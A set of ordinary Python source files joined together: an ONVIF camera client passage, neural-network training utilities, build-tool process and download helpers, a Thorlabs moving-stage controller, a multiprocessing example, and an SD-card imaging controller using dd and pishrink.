if user:
self.user = user
if passwd:
self.passwd = passwd
security = Security()
if self.encrypt:
token = UsernameDigestTokenDtDiff(self.user, self.passwd, dt_diff=self.dt_diff)
else:
token = UsernameToken(self.user, self.passwd)
token.setnonce()
token.setcreated()
security.tokens.append(token)
self.ws_client.set_options(wsse=security)
@classmethod
@safe_func
def clone(cls, service, *args, **kwargs):
clone_service = service.ws_client.clone()
kwargs['ws_client'] = clone_service
return ONVIFService(*args, **kwargs)
@staticmethod
@safe_func
def to_dict(sudsobject):
# Convert a WSDL Type instance into a dictionary
if sudsobject is None:
return { }
elif isinstance(sudsobject, list):
ret = [ ]
for item in sudsobject:
ret.append(Client.dict(item))
return ret
return Client.dict(sudsobject)
def service_wrapper(self, func):
@safe_func
def wrapped(params=None, callback=None):
def call(params=None, callback=None):
# No params
# print(params.__class__.__mro__)
if params is None:
params = {}
elif isinstance(params, suds.sudsobject.Object):
params = ONVIFService.to_dict(params)
ret = func(**params)
if callable(callback):
callback(ret)
return ret
if self.daemon:
th = Thread(target=call, args=(params, callback))
th.daemon = True
th.start()
else:
return call(params, callback)
return wrapped
def __getattr__(self, name):
'''
Call the real ONVIF service operations.
See the official WSDL definitions for the
API details (API name, request parameters,
response parameters, parameter types, etc.).
'''
builtin = name.startswith('__') and name.endswith('__')
if builtin:
return self.__dict__[name]
else:
return self.service_wrapper(getattr(self.ws_client.service, name))
class ONVIFCamera(object):
'''
Python implementation of an ONVIF-compliant device.
This class integrates ONVIF services.
The adjust_time parameter allows authentication on cameras that are not time synchronized.
Please note that using NTP on both ends is the recommended solution;
this should only be used in "safe" environments.
Also, this cannot be used on AXIS cameras, as every request is authenticated, contrary to the ONVIF standard.
>>> from onvif import ONVIFCamera
>>> mycam = ONVIFCamera('192.168.0.112', 80, 'admin', '12345')
>>> mycam.devicemgmt.GetServices(False)
>>> media_service = mycam.create_media_service()
>>> ptz_service = mycam.create_ptz_service()
# Get PTZ Configuration:
>>> mycam.ptz.GetConfiguration()
# Another way:
>>> ptz_service.GetConfiguration()
'''
def __init__(self, host, port ,user, passwd, wsdl_dir=os.path.join(os.path.dirname(os.path.dirname(__file__)), "wsdl"),
cache_location=None, cache_duration=None,
encrypt=True, daemon=False, no_cache=False,
adjust_time=False, timeout=None, force_provided_host=False):
self.services_template = {'devicemgmt': None, 'ptz': None, 'media': None,
'imaging': None, 'events': None, 'analytics': None }
self.use_services_template = {'devicemgmt': True, 'ptz': True, 'media': True,
'imaging': True, 'events': True, 'analytics': True }
self.host = host
self.port = int(port)
self.user = user
self.passwd = passwd
self.wsdl_dir = wsdl_dir
self.cache_location = cache_location
self.cache_duration = cache_duration
self.encrypt = encrypt
self.daemon = daemon
self.no_cache = no_cache
self.adjust_time = adjust_time
self.timeout = timeout
self.force_provided_host = force_provided_host
# Active service client container
self.services = { }
self.services_lock = RLock()
# Set xaddrs
self.update_xaddrs()
self.to_dict = ONVIFService.to_dict
def update_xaddrs(self):
# Establish devicemgmt service first
self.dt_diff = None
self.devicemgmt = self.create_devicemgmt_service()
if self.adjust_time :
cdate = self.devicemgmt.GetSystemDateAndTime().UTCDateTime
cam_date = dt.datetime(cdate.Date.Year, cdate.Date.Month, cdate.Date.Day, cdate.Time.Hour, cdate.Time.Minute, cdate.Time.Second)
self.dt_diff = cam_date - dt.datetime.utcnow()
self.devicemgmt.dt_diff = self.dt_diff
self.devicemgmt.set_wsse()
# Get XAddr of services on the device
self.xaddrs = { }
capabilities = self.devicemgmt.GetCapabilities({'Category': 'All'})
for name, capability in capabilities:
try:
if name.lower() in SERVICES:
ns = SERVICES[name.lower()]['ns']
service_xaddr = capability['XAddr']
if self.force_provided_host:
# regex to capture everything from http[s]:// to the following /
host_regex = re.compile(r"^(https?://)(.*?)/", re.IGNORECASE)
provided_host_and_port = "{}:{}".format(self.host, self.port)
replacement_xaddr = re.sub(
host_regex,
r"\g<1>{}/".format(provided_host_and_port),
service_xaddr
)
service_xaddr = replacement_xaddr
self.xaddrs[ns] = service_xaddr
except Exception:
logger.exception('Unexpected service type')
with self.services_lock:
try:
self.event = self.create_events_service()
self.xaddrs['http://www.onvif.org/ver10/events/wsdl/PullPointSubscription'] = self.event.CreatePullPointSubscription().SubscriptionReference.Address
except:
pass
def update_url(self, host=None, port=None):
changed = False
if host and self.host != host:
changed = True
self.host = host
if port and self.port != port:
changed = True
self.port = port
if not changed:
return
self.devicemgmt = self.create_devicemgmt_service()
self.capabilities = self.devicemgmt.GetCapabilities()
with self.services_lock:
for sname in self.services.keys():
xaddr = getattr(self.capabilities, sname.capitalize()).XAddr
self.services[sname].ws_client.set_options(location=xaddr)
def update_auth(self, user=None, passwd=None):
changed = False
if user and user != self.user:
changed = True
self.user = user
if passwd and passwd != self.passwd:
changed = True
self.passwd = passwd
if not changed:
return
with self.services_lock:
for service in self.services.keys():
self.services[service].set_wsse(user, passwd)
def get_service(self, name, create=True):
service = None
service = getattr(self, name.lower(), None)
if not service and create:
return getattr(self, 'create_%s_service' % name.lower())()
return service
def get_definition(self, name):
'''Returns xaddr and wsdl of specified service'''
# Check if the service is supported
if name not in SERVICES:
raise ONVIFError('Unknown service %s' % name)
wsdl_file = SERVICES[name]['wsdl']
ns = SERVICES[name]['ns']
wsdlpath = os.path.join(self.wsdl_dir, wsdl_file)
if not os.path.isfile(wsdlpath):
raise ONVIFError('No such file: %s' % wsdlpath)
# XAddr for devicemgmt is fixed:
if name == 'devicemgmt':
xaddr = 'http://%s:%s/onvif/device_service' % (self.host, self.port)
return xaddr, wsdlpath
# Get other XAddr
xaddr = self.xaddrs.get(ns)
if not xaddr:
raise ONVIFError('Device does not support service: %s' % name)
return xaddr, wsdlpath
def create_onvif_service(self, name, from_template=True, portType=None):
'''Create ONVIF service client'''
name = name.lower()
xaddr, wsdl_file = self.get_definition(name)
with self.services_lock:
svt = self.services_template.get(name)
# Has a template, clone from it. Faster.
if svt and from_template and self.use_services_template.get(name):
service = ONVIFService.clone(svt, xaddr, self.user,
self.passwd, wsdl_file,
self.cache_location,
self.cache_duration,
self.encrypt,
self.daemon,
no_cache=self.no_cache,
portType=portType,
dt_diff=self.dt_diff,
timeout=self.timeout)
# No template, create new service from wsdl document.
# A little time-consuming
else:
service = ONVIFService(xaddr, self.user, self.passwd,
wsdl_file, self.cache_location,
self.cache_duration, self.encrypt,
self.daemon, no_cache=self.no_cache,
portType=portType, dt_diff=self.dt_diff,
timeout=self.timeout)
self.services[name] = service
setattr(self, name, service)
if not self.services_template.get(name):
self.services_template[name] = service
return service
def create_devicemgmt_service(self, from_template=True):
# The entry point for devicemgmt service is fixed.
return self.create_onvif_service('devicemgmt', from_template)
def create_media_service(self, from_template=True):
return self.create_onvif_service('media', from_template)
def create_ptz_service(self, from_template=True):
return self.create_onvif_service('ptz', from_template)
def create_imaging_service(self, from_template=True):
return self.create_onvif_service('imaging', from_template)
def create_deviceio_service(self, from_template=True):
return self.create_onvif_service('deviceio', from_template)
def create_events_service(self, from_template=True):
return self.create_onvif_service('events', from_template)
def create_analytics_service(self, from_template=True):
return self.create_onvif_service('analytics', from_template)
def create_recording_service(self, from_template=True):
return self.create_onvif_service('recording', from_template)
def create_search_service(self, from_template=True):
return self.create_onvif_service('search', from_template)
def create_replay_service(self, from_template=True):
return self.create_onvif_service('replay', from_template)
def create_pullpoint_service(self, from_template=True):
return self.create_onvif_service('pullpoint', from_template, portType='PullPointSubscription')
def create_receiver_service(self, from_template=True):
return self.create_onvif_service('receiver', from_template)
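# Illustrative note (assumption, not from the original module): with
# force_provided_host=True, update_xaddrs() rewrites the host and port that
# the camera reports in each service XAddr, e.g. a reported XAddr of
# 'http://10.0.0.5:8080/onvif/media', with host='192.168.0.112' and port=80,
# becomes 'http://192.168.0.112:80/onvif/media'.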
|
base.py
|
import csv
import os
import time
import random as rand
from shared import Instance
from java.lang import Math
import Queue
import threading
__all__ = ['initialize_instances', 'error_on_data_set',
'train', 'make_dirs', 'f1_score', 'write_to_file']
def printer():
while True:
item = printqueue.get()
if item is None:
break
if len(item) == 2:
path = item[0]
txt = item[1]
with open(path, 'a+') as f:
f.write(txt)
printqueue.task_done()
printqueue = Queue.Queue()
t = threading.Thread(target=printer)
t.start()
def write_to_file(f, txt):
printqueue.put((f, txt))
def make_dirs(OUTPUT_DIRECTORY):
if not os.path.exists(OUTPUT_DIRECTORY):
os.makedirs(OUTPUT_DIRECTORY)
if not os.path.exists(OUTPUT_DIRECTORY + '/images'):
os.makedirs(OUTPUT_DIRECTORY + '/images')
subdirs = ['NN_OUTPUT', 'CONTPEAKS', 'FLIPFLOP', 'TSP']
for subdir in subdirs:
if not os.path.exists('{}/{}'.format(OUTPUT_DIRECTORY, subdir)):
os.makedirs('{}/{}'.format(OUTPUT_DIRECTORY, subdir))
if not os.path.exists('{}/images/{}'.format(OUTPUT_DIRECTORY, subdir)):
os.makedirs('{}/images/{}'.format(OUTPUT_DIRECTORY, subdir))
def initialize_instances(infile):
"""Read the given CSV data into a list of instances."""
instances = []
# Read in the CSV file
with open(infile, "r") as dat:
reader = csv.reader(dat)
for row in reader:
instance = Instance([float(value) for value in row[:-1]])
# TODO: Set to <= 0 to handle 0/1 labels and not just -1/1?
instance.setLabel(Instance(0 if float(row[-1]) < 0 else 1))
instances.append(instance)
return instances
# Adapted from:
# https://codereview.stackexchange.com/questions/36096/implementing-f1-score
# https://www.kaggle.com/hongweizhang/how-to-calculate-f1-score
# https://blog.exsilio.com/all/accuracy-precision-recall-f1-score-interpretation-of-performance-measures/
def f1_score(labels, predicted):
def get_count(x): return sum([1 for i in x if i is True])
tp = get_count([predicted[i] == x and x ==
1.0 for i, x in enumerate(labels)])
tn = get_count([predicted[i] == x and x ==
0.0 for i, x in enumerate(labels)])
fp = get_count([predicted[i] == 1.0 and x ==
0.0 for i, x in enumerate(labels)])
fn = get_count([predicted[i] == 0.0 and x ==
1.0 for i, x in enumerate(labels)])
if tp == 0:
return 0, 0, 0
precision = float(tp) / (tp + fp)
recall = float(tp) / (tp + fn)
try:
f1 = 2 * precision * recall / (precision + recall)
except ZeroDivisionError:
return precision, recall, 0.0
return precision, recall, f1
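# Worked example (illustrative values only):
#   labels    = [1.0, 0.0, 1.0, 1.0]
#   predicted = [1.0, 0.0, 0.0, 1.0]
#   -> tp=2, tn=1, fp=0, fn=1
#   precision = 2/2 = 1.0, recall = 2/3 ~ 0.667, f1 = 2*1.0*0.667/1.667 = 0.8
#   f1_score(labels, predicted)  # returns (1.0, 0.666..., 0.8)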
def error_on_data_set(network, ds, measure, ugh=False):
N = len(ds)
error = 0.
correct = 0
incorrect = 0
actuals = []
predicteds = []
for instance in ds:
network.setInputValues(instance.getData())
network.run()
actual = instance.getLabel().getContinuous()
predicted = network.getOutputValues().get(0)
predicted = max(min(predicted, 1), 0)
if ugh:
print("label: {}".format(instance.getLabel()))
print("actual: {}, predicted: {}".format(actual, predicted))
predicteds.append(round(predicted))
actuals.append(max(min(actual, 1), 0))
if abs(predicted - actual) < 0.5:
correct += 1
if ugh:
print("CORRECT")
else:
incorrect += 1
if ugh:
print("INCORRECT")
output = instance.getLabel()
output_values = network.getOutputValues()
example = Instance(output_values, Instance(output_values.get(0)))
error += measure.value(output, example)
if ugh:
print("error: {}".format(measure.value(output, example)))
MSE = error / float(N)
acc = correct / float(correct + incorrect)
precision, recall, f1 = f1_score(actuals, predicteds)
if ugh:
print("MSE: {}, acc: {}, f1: {} (precision: {}, recall: {})".format(MSE, acc, f1, precision, recall))
import sys
sys.exit(0)
return MSE, acc, f1
def train(oa, network, oaName, training_ints, validation_ints, testing_ints, measure, training_iterations, outfile):
"""Train a given network on a set of instances.
"""
# print("\nError results for %s\n---------------------------" % (oaName,))
times = [0]
for iteration in xrange(training_iterations):
start = time.clock()
oa.train()
elapsed = time.clock() - start
times.append(times[-1] + elapsed)
if iteration % 10 == 0:
MSE_trg, acc_trg, f1_trg = error_on_data_set(
network, training_ints, measure)
MSE_val, acc_val, f1_val = error_on_data_set(
network, validation_ints, measure)
MSE_tst, acc_tst, f1_tst = error_on_data_set(
network, testing_ints, measure)
txt = '{},{},{},{},{},{},{},{},{},{},{}\n'.format(iteration, MSE_trg, MSE_val, MSE_tst, acc_trg, acc_val,
acc_tst, f1_trg, f1_val, f1_tst, times[-1])
# print(txt)
write_to_file(outfile, txt)
|
utils.py
|
# XXX should consolidate this with lib
import logging
from os import path
import subprocess
import StringIO
import hashlib
import json
import sys
import os
import stat
import time
import threading
import Queue
import urlparse
import lib
from genshi.template import NewTextTemplate
LOG = logging.getLogger(__name__)
class ShellError(lib.BASE_EXCEPTION):
def __init__(self, message, output):
self.message = message
self.output = output
def __str__(self):
return "%s: %s" % (self.message, self.output)
# # # # # # # # # # # # # # # # # # #
#
# Data transform
# TODO XPath or similar?
#
# # # # # # # # # # # # # # # # # # #
def transform(data, node_steps, fn, allow_set=False):
'''Mutate an arbitrary nested dictionary/array combination with the given function.
``node_steps`` is dot-separated instructions on how to arrive at the data node
which needs changing::
array_name.[]
dictionary.key_name
dictionary.* // all keys in a dictionary
:param data: a nested dictionary / array combination
:type data: ``dict``
:param node_steps: dot-separated data path, e.g. my_dict.my_array.[].*.target_key
:param fn: mutating function - will be passed the data found at the end
of ``node_steps``, and should return the desired new value
:param allow_set: if True the mutating function will be called with None for
non-existing keys - i.e. you can set new keys
'''
obj = data.copy()
list(_handle_all(obj, node_steps.split('.'), fn, allow_set))
return obj
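# Illustrative example (assumed data, not from the original module):
#   data = {'my_array': [{'target_key': 'a'}, {'target_key': 'b'}]}
#   transform(data, 'my_array.[].target_key', lambda v: v.upper())
#   # -> {'my_array': [{'target_key': 'A'}, {'target_key': 'B'}]}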
def _yield_plain(obj, name):
'If obj is a dictionary, yield an attribute'
if hasattr(obj, '__contains__') and name in obj:
yield obj[name]
def _yield_array(obj):
'Yield all elements of an array'
assert hasattr(obj, '__iter__'), 'Expecting an array, got %s' % obj
for thing in obj:
yield thing
def _yield_asterisk(obj):
'Yield all values in a dictionary'
if hasattr(obj, 'iteritems'):
for _, value in obj.iteritems():
yield value
def _yield_any(obj, name):
'Yield a value, or array or dictionary values'
if name == '*':
return _yield_asterisk(obj)
elif name == '[]':
return _yield_array(obj)
else:
return _yield_plain(obj, name)
def recurse_dict(dictionary, fn):
'''
recurse into nested dictionaries, applying ``fn`` to every leaf value
'''
for key, value in dictionary.iteritems():
if hasattr(value, 'iteritems'):
recurse_dict(value, fn)
else:
dictionary[key] = fn(value)
def _handle_all(obj, steps, fn, allow_set):
if len(steps) > 1:
for value in _yield_any(obj, steps[0]):
for x in _handle_all(value, steps[1:], fn, allow_set):
yield x
else:
step = steps[0]
if step == '*':
assert hasattr(obj, 'iteritems'), 'Expecting a dictionary, got %s' % obj
recurse_dict(obj, fn)
elif step == '[]':
assert hasattr(obj, '__iter__'), 'Expecting an array, got %s' % obj
for i, x in enumerate(obj):
obj[i] = fn(x)
else:
if hasattr(obj, '__contains__') and step in obj:
obj[step] = fn(obj[step])
elif allow_set:
obj[step] = fn(None)
# # # # # # # # # # # # # # # # # # #
#
# End data transform
#
# # # # # # # # # # # # # # # # # # #
def render_string(config, in_s):
'''Render a Genshi template as a string
:param config: data dictionary
:param in_s: genshi template
'''
tmpl = NewTextTemplate(in_s)
# older versions of python don't allow unicode keyword arguments
# so we have to encode the keys (for best compatibility in the client side tools)
config = _encode_unicode_keys(config)
return tmpl.generate(**config).render('text').decode('utf8')
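# Illustrative example (assumed config and template, using Genshi's ${...} syntax):
#   render_string({'name': 'world'}, u'Hello ${name}')
#   # -> u'Hello world'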
def _encode_unicode_keys(dictionary):
'''Returns a new dictionary constructed from the given one, but with the keys encoded as strings.
:param dictionary: dictionary to encode the keys for
(For use with old versions of python that can't use unicode keys for keyword arguments)'''
new_items = [(str(k), v) for k, v in dictionary.items()]
return dict(new_items)
def _resolve_url(config, url, prefix):
'''Prefix non-absolute URLs with the path to the user's code'''
if hasattr(url, "startswith"):
# string
if url.startswith('http://') or \
url.startswith('https://') or \
url.startswith(prefix):
return url
else:
return prefix + url if url.startswith('/') else prefix + '/' + url
else:
# summat else
return url
class RunnerState(object):
pass
class ProcessGroup(object):
"""Helper for managing a collection of processes and ensuring they're all shut down."""
def __init__(self):
self._running_processes = {}
self._notifications = Queue.Queue()
self._procs = 0
def spawn(self, *args, **kw):
"""Create (and start) a new process."""
self._procs += 1
group_id = self._procs
proc = ProcessWithLogging(group_id, self._notifications, *args, **kw)
proc.start()
self._running_processes[group_id] = proc
def wait_for_success(self):
"""Wait for every process to succeed.
If one process fails, shuts all the other processes down.
If an interrupt is received from the tools, shuts all processes down.
"""
call = lib.current_call()
try:
while self._running_processes != {}:
try:
finished_pid = self._notifications.get(timeout=1)
finished_proc = self._running_processes[finished_pid]
finished_proc.assert_success()
del self._running_processes[finished_pid]
except Queue.Empty:
call.assert_not_interrupted()
finally:
self._shutdown_running_processes()
def _shutdown_running_processes(self):
for pid, proc in self._running_processes.items():
proc.kill()
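# Minimal usage sketch (illustrative; the command lists below are assumptions):
#   group = ProcessGroup()
#   group.spawn(['my_build_tool', '--target', 'android'])
#   group.spawn(['my_build_tool', '--target', 'ios'])
#   group.wait_for_success()  # blocks; shuts everything down if any process fails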
class ProcessWithLogging(object):
"""Wrapper around a subprocess.Popen
Logs output from the subprocess.
Notifies through a queue when it has finished.
"""
def __init__(self, group_id, notify, args, **kw):
self._notify = notify
self._group_id = group_id
self._args = args
self._check_for_interrupt = kw.get('check_for_interrupt', False)
self._command_log_level = kw.get("command_log_level", logging.DEBUG)
self._filter = kw.get("filter", False)
self._env = kw.get("env")
self._fail_if = kw.get("fail_if")
self._state = RunnerState()
self._state.done = False
self._state.output = StringIO.StringIO()
self._state.proc = None
self._state.error = None
self._process_launched = Queue.Queue()
def start(self):
self._runner_thread = threading.Thread(target=self._runner)
self._runner_thread.daemon = True
self._runner_thread.start()
self._wait_until_process_started()
def _wait_until_process_started(self):
try:
process_launched = self._process_launched.get(timeout=20)
except Queue.Empty:
raise ShellError('Failed to start up subprocess "%s", took longer than 20 seconds.' % self._args[0], output='')
if process_launched != self.PROCESS_START_SUCCESS:
raise self._state.error
def pid(self):
return self._state.proc.pid
def assert_success(self):
assert self._state.done
if self._state.error:
raise self._state.error
def kill(self):
import lib
lib.progressive_kill(self._state.proc.pid)
PROCESS_START_SUCCESS = 9001
PROCESS_START_FAILURE = 9002
PROCESS_FINISH_SUCCESS = 9003
PROCESS_EXCEPTION = 9004
def _runner(self):
try:
self._state.proc = lib.PopenWithoutNewConsole(self._args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=self._env)
self._process_launched.put(self.PROCESS_START_SUCCESS)
for line in iter(self._state.proc.stdout.readline, ''):
if not self._filter or self._filter(line):
self._state.output.write(line)
LOG.log(self._command_log_level, line.rstrip('\r\n'))
if self._fail_if and self._fail_if(line):
raise ShellError('Detected failure based on output of subprocess "%s"' % self._args[0], self._state.output.getvalue())
except Exception as e:
if self._state.proc is None:
self._process_launched.put(self.PROCESS_START_FAILURE)
else:
self._process_launched.put(self.PROCESS_EXCEPTION)
self._state.error = e
finally:
self._finished()
def _finished(self):
self._state.done = True
self._notify.put(self._group_id)
# TODO: extract common logic in ProcessWithLogging and run_shell
def _required_preexec(create_process_group, os):
if create_process_group and getattr(os, 'setsid', None) is not None:
return os.setsid
def run_shell(*args, **kw):
check_for_interrupt = kw.get('check_for_interrupt', False)
create_process_group = kw.get('create_process_group', False)
fail_silently = kw.get('fail_silently', False)
command_log_level = kw.get("command_log_level", logging.DEBUG)
filter = kw.get("filter", False)
state = RunnerState()
state.done = False
state.output = StringIO.StringIO()
state.proc = None
state.error = None
def runner():
try:
preexec_fn = _required_preexec(create_process_group, os)
state.proc = lib.PopenWithoutNewConsole(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=kw.get('env'), preexec_fn=preexec_fn)
for line in iter(state.proc.stdout.readline, ''):
if filter:
line = filter(line)
if line != False:
state.output.write(line)
LOG.log(command_log_level, line.rstrip('\r\n'))
state.done = True
except Exception as e:
state.done = True
state.error = e
if check_for_interrupt:
try:
call = lib.current_call()
runner_thread = threading.Thread(target=runner)
runner_thread.daemon = True
runner_thread.start()
while not state.done:
time.sleep(1)
call.assert_not_interrupted()
finally:
# if interrupted, kill child process
if state.proc and not state.done:
lib.progressive_kill(state.proc.pid, kill_process_group=create_process_group)
else:
runner()
if state.error:
raise state.error
if state.proc.wait() != 0:
if fail_silently:
LOG.debug('Failed to run %s, but was told to carry on anyway' % subprocess.list2cmdline(args))
else:
raise ShellError(
message="Failed when running {command}".format(command=args[0]),
output=state.output.getvalue()
)
return state.output.getvalue()
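# Minimal usage sketch (illustrative command, not from the original module):
#   output = run_shell('git', 'status', command_log_level=logging.INFO)
#   # raises ShellError (with the captured output) if the command exits non-zero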
def which(program):
"http://stackoverflow.com/questions/377017/test-if-executable-exists-in-python"
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
if sys.platform.startswith("win"):
programs = [".".join((program, extension)) for extension in ("cmd", "exe", "bat")]
programs.insert(0, program)
else:
programs = [program]
for program_name in programs:
fpath, fname = os.path.split(program_name)
if fpath:
if is_exe(program_name):
LOG.debug("using {name} for {program}".format(
name=program_name, program=program))
return program_name
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program_name)
if is_exe(exe_file):
LOG.debug("using {name} for {program}".format(
name=exe_file, program=program))
return exe_file
return None
def ensure_lib_available(cookies, platform_version, file):
if 'FORGE_PLATFORM_LOCATION' in os.environ:
return path.abspath(path.join(os.environ['FORGE_PLATFORM_LOCATION'], 'generate', 'lib', file))
module_dynamic_path = path.split(path.abspath(__file__))[0]
lib_dir = path.abspath(path.join(module_dynamic_path, '..', '..', '.lib'))
hash_path = path.abspath(path.join(module_dynamic_path, '..', 'hash.json'))
if not path.exists(lib_dir):
os.makedirs(lib_dir)
# Hide directory on windows
if sys.platform == 'win32':
try:
lib.PopenWithoutNewConsole(['attrib', '+h', lib_dir]).wait()
except Exception:
# don't care if we fail to hide the lib dir
pass
from trigger import forge_tool
remote = forge_tool.singleton.remote
server_details = urlparse.urlparse(remote.server)
if not path.exists(hash_path):
url = "{protocol}://{netloc}/lib-static/{platform_version}/{file}".format(
protocol=server_details.scheme,
netloc=server_details.netloc,
platform_version=platform_version,
file='hash.json'
)
remote._get_file(url, hash_path, cookies=cookies)
with open(hash_path, 'r') as hash_file:
hashes = json.load(hash_file)
file_path = path.join(lib_dir, file)
if path.exists(file_path) and file in hashes:
# Check hash
with open(file_path, 'rb') as cur_file:
hash = hashlib.md5(cur_file.read()).hexdigest()
if hash == hashes[file]:
# File exists and is correct
LOG.debug("File: %s, already downloaded and correct." % file)
return file_path
# File doesn't exist, or has the wrong hash or has no known hash - download
LOG.info("Downloading lib file: %s, this will only happen when a new file is available." % file)
url = "{protocol}://{netloc}/lib-static/{platform_version}/{file}".format(
protocol=server_details.scheme,
netloc=server_details.netloc,
platform_version=platform_version,
file=file
)
remote._get_file(url, file_path, cookies=cookies)
# Make file executable.
os.chmod(file_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH)
return file_path
|
thorlabs_apt_moving_stage.py
|
########################################################################
#
# This module contains classes for controlling and displaying properties
# of the APT Thorlabs moving stage
#
########################################################################
import multiprocessing
from consts import *
########################################################################
#
# Managing class that communicates with the process where
# the device resides
#
########################################################################
class ManagerThorlabsAPTMovingStage :
"""
Class that manages the moving stage
"""
def __init__ (self, SerialNumber) :
# Create the lock for device
self.lock = multiprocessing.Lock()
# Create a pipe for communication
self.parent_connection, self.child_connection = multiprocessing.Pipe()
# Saving the serial number
self.SerialNumber = SerialNumber
def __del__ (self) :
self.parent_connection.close()
self.child_connection.close()
def start(self) :
"""
Start the process controlling the moving stage
"""
p = multiprocessing.Process(target=MovingStageProc, args=(self.SerialNumber,self.child_connection))
p.start()
return p
def run(self, command, arguments=None) :
"""
Send the command to a moving stage through the pipe
"""
self.lock.acquire()
self.parent_connection.send( (command, arguments) )
result = self.parent_connection.recv()
self.lock.release()
return result
def exit(self) :
"""
Close the process
"""
return self.run("Exit")
def AbsMove(self, position) :
"""
Move the moving stage without waiting for the motion to complete.
"""
return self.run( "AbsMove", position )
def AbsMoveWait(self, position) :
"""
Move the moving stage and wait until the motion completes
"""
return self.run( "AbsMoveWait", position )
########################################################################
#
# Process where the device resides
#
########################################################################
def MovingStageProc(SerialNumber, pipe) :
"""
This function will be run as a separate process
"""
import wx.lib.activex, threading
class ThorlabsAPTMovingStage (wx.lib.activex.ActiveXCtrl) :
"""
Control moving stage
"""
def __init__ (self, SerialNumber, pipe) :
self.frame = wx.Frame (None, title="Moving stage SN: %d" % SerialNumber)
panel = wx.Panel (self.frame)
wx.lib.activex.ActiveXCtrl.__init__ (self, panel, 'MGMOTOR.MGMotorCtrl.1', size=self.frame.GetSizeTuple(), name='Moving stage')
# Initializing the device by specifying its serial number
self.ctrl.StartCtrl()
self.ctrl.HWSerialNum = SerialNumber
self.ctrl.Identify()
# Building simple gui
sizer = wx.BoxSizer ()
sizer.Add (self, flag=wx.EXPAND)
panel.SetSizer (sizer)
self.frame.Show()
#self.frame.Hide()
# saving the pipe
self.pipe = pipe
# starting thread for checking commands sent from other processes
threading.Thread(target=self.CheckCommands).start()
def AbsMove (self, position) :
self.ctrl.SetAbsMovePos(0, position)
self.ctrl.MoveAbsolute(0,0)
return RETURN_SUCCESS
def AbsMoveWait (self, position) :
self.AbsMove(position)
# Wait till movement finishes
status = 0xFF
while ((status >> 5)&0x1)|((status >> 6)&0x1) : status = self.ctrl.GetStatusBits_Bits(0)
return RETURN_SUCCESS
def CheckCommands (self) :
# Checking the pipe for requested commands
# until "Exit" is sent
for command, arguments in iter(self.pipe.recv, ("Exit",None)) :
# Run requested command
try :
try : result = getattr(self, command)(arguments)
except RuntimeError, e :
result = RETURN_FAIL; print e.message;
except AttributeError :
print "\n\nPulse Shaper Error : Unrecognised command: " + command
result = RETURN_FAIL
# returning the result
self.pipe.send(result)
# Closing the process
wx.CallAfter(self.frame.Close)
self.pipe.send(RETURN_SUCCESS)
# Starting the wx application
wx_app = wx.PySimpleApp(False)
stage = ThorlabsAPTMovingStage(SerialNumber, pipe)
wx_app.MainLoop()
|
para_example.py
|
import multiprocessing
import numpy as np
def worker(i, return_dict):
# return_dict[i] = np.random.normal(size=5)
return_dict.append(np.random.normal(size=5))
if __name__ == '__main__':
manager = multiprocessing.Manager()
return_dict = manager.list()
jobs = []
for i in range(5):
p = multiprocessing.Process(target=worker, args=(i, return_dict))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
print(return_dict)
# print (return_dict.values())
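# Variant sketch (assumption, mirroring the commented-out lines above): using a
# manager.dict() keyed by worker index records which worker produced which
# sample; collect the results with return_dict.values() after joining.
#   return_dict = manager.dict()
#   # inside worker: return_dict[i] = np.random.normal(size=5)
#   # after joining: print(return_dict.values())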
|
shellController.py
|
import pyudev
import re
import subprocess
from threading import Thread
import sys
from subprocess import Popen, PIPE, CalledProcessError
class ShellController:
def __init__(self):
self.udev_context = pyudev.Context()
self.local_dir = "/mnt/drive1/pisd_images/"
self.usb_mnt_dir = "/media/pisdImager/"
self.dd_prog_msg = ""
self.status = ""
def formatDDOutput(self, msg):
msg_list = msg.split(" ")
if(len(msg_list) >= 10):
data_in_bytes = msg_list[0] + " " + msg_list[1]
data_moved = msg_list[2] + " " + msg_list[3] + " " + msg_list[4] + " " + msg_list[5] + " " + msg_list[6]
time_elapsed = msg_list[7]
speed = msg_list[9] + " " + msg_list[10]
data = {
"data_in_bytes": data_in_bytes,
"data_moved" : data_moved,
"time_elapsed" : float(time_elapsed),
"speed" : speed
}
print(data)
self.dd_prog_msg = data
def ddExec(self, command):
try:
process = subprocess.Popen(command, stderr=subprocess.PIPE)
self.status="dd-copy"
line = ''
while True:
out = process.stderr.read(1)
# print(type(out))
if out == b'' and process.poll() is not None:
print("ending here")
break
if out != b'':
s = out.decode("utf-8")
if s == '\r':
# self.formatDDOutput(line)
self.dd_prog_msg = line + "\n"
line = ''
else:
line = line + s
if out == b'':
print("wtf",out.decode('utf-8'))
break
except Exception as e:
print(str(e))
return "error"
def commandExec(self, command):
try:
out = subprocess.check_output(command, shell=True)
return out.decode().rstrip("\n")
except:
return "error"
def execute(self, cmd):
popen = subprocess.Popen(cmd, stdout=subprocess.PIPE, universal_newlines=True)
for stdout_line in iter(popen.stdout.readline, ""):
yield stdout_line
popen.stdout.close()
return_code = popen.wait()
if return_code:
raise subprocess.CalledProcessError(return_code, cmd)
def PishrinkExec(self, command):
try:
process = subprocess.Popen(command, stderr=subprocess.PIPE)
self.status="pishrink Process"
line = ''
while True:
out = process.stderr.read(1)
# print(type(out))
if out == b'' and process.poll() is not None:
print("ending here")
break
if out != b'':
s = out.decode("utf-8")
if s == '\r':
print("pishrink", line)
line = ''
else:
line = line + s
if out == b'':
print("wtf",out.decode('utf-8'))
break
except Exception as e:
print(str(e))
return "error"
def USBDeviceList(self):
devices = {}
for device in self.udev_context.list_devices():
if(device.get('ID_USB_DRIVER') == "usb-storage" and device.get('DEVTYPE') == "disk"):
dev_name = device.get('DEVNAME')
devices[dev_name] = {
"path":dev_name,
"model":device.get("ID_MODEL")
}
return devices
def MakeSDImage(self, sd_card, output, bs="1M"):
cmd = ["dd", "if={}".format(sd_card), "of={}".format(output), "bs={}".format(bs), "status=progress"]
self.ddExec(cmd)
def PiShrink(self, file, tozip=True, reset=True):
cmd = ['pishrink.sh']
if(tozip):
cmd.append("-a")
cmd.append("-z")
if(reset):
cmd.append("-p")
cmd.append("-v")
cmd.append(file)
